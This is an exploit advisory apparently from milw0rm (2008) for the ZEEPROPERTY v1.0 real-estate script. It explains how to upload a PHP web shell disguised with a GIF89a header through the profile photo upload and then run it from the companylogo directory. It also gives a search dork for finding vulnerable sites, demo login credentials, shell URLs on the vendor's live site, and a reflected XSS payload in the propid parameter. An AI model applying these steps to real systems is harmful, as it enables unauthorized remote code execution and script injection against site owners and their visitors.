63 lines
No EOL
1,014 B
Text
63 lines
No EOL
1,014 B
Text
ZEEPROPERTY v1.0 remote file Upload & XSS
|
|
|
|
author: ZoRLu msn: trt-turk@hotmail.com
|
|
|
|
home: www.z0rlu.blogspot.com
|
|
|
|
dork: "Designed & Developed by Zeeways.com"
|
|
|
|
|
|
first register to site
|
|
|
|
you add this code your shell to head
|
|
|
|
GIF89a;
|
|
|
|
example your_shell.php:
|
|
|
|
GIF89a;
|
|
<?
|
|
|
|
...
|
|
|
|
...
|
|
|
|
...
|
|
|
|
?>
|
|
|
|
and save your_sheell.php
|
|
|
|
|
|
after login to site and you change your profile ( direckt link: localhost/viewprofile.php )
|
|
|
|
add your photo ( you_shell.php upload ) after open new page you right clik your photo and select to properties
|
|
|
|
copy photo link and paste your explorer go your shell
|
|
|
|
your_shell:
|
|
|
|
localhost/script_path/companylogo/[id].php
|
|
|
|
|
|
example for demo:
|
|
|
|
user: zeeways
|
|
|
|
passwd: testing:
|
|
|
|
change profile direckt link: http://www.zeeproperty.com/viewprofile.php
|
|
|
|
and your_shell link:
|
|
|
|
http://www.zeeproperty.com/companylogo/5622365.php
|
|
|
|
|
|
XSS for demo:
|
|
|
|
http://www.zeeproperty.com/view_prop_details.php?propid="><script>alert()</script>
|
|
|
|
|
|
thanks: str0ke & yildirimordulari.org & darkc0de.com
|
|
|
|
# milw0rm.com [2008-11-08] |